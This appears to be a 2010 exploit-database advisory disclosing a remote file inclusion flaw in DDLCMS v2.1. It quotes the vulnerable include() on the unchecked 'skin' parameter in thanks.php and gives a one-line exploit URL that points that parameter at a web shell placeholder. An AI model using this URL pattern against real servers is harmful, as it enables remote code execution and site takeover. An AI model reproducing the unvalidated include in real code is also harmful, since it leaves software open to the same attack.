DDLCMS v2.1 (skin) Remote File Inclusion Vulnerability

2010-06-03 / 2010-06-04

Credit: eidelweiss

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

==============================================================
DDLCMS v2.1 (skin) Remote File Inclusion Vulnerability
==============================================================
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Vendor: www.ddlcms.com
download: http://www.ddlcms.com/download.php
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
=====================================================================
-=[ Vuln Code ]=-
[-] /thanks.php
include(WWWROOT . 'skins/' . $skin . '/header.php'); // line 46
include(WWWROOT . 'leftside.php');
=====================================================================
-=[ P0C ]=-
"skin" parameter in FILE thanks.php is not Defined which can allow remote attackers to execute arbitrary PHP code via a URL
-=[ exploit ]=-
http://127.0.0.1/thanks.php?skin= [inj3ct0r sh3ll]
=========================| -=[ E0F ]=- |=========================

References:

http://eidelweiss-advisories.blogspot.com/2010/06/ddlcms-v21-skin-remote-file-inclusion.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

DDLCMS v2.1 (skin) Remote File Inclusion Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.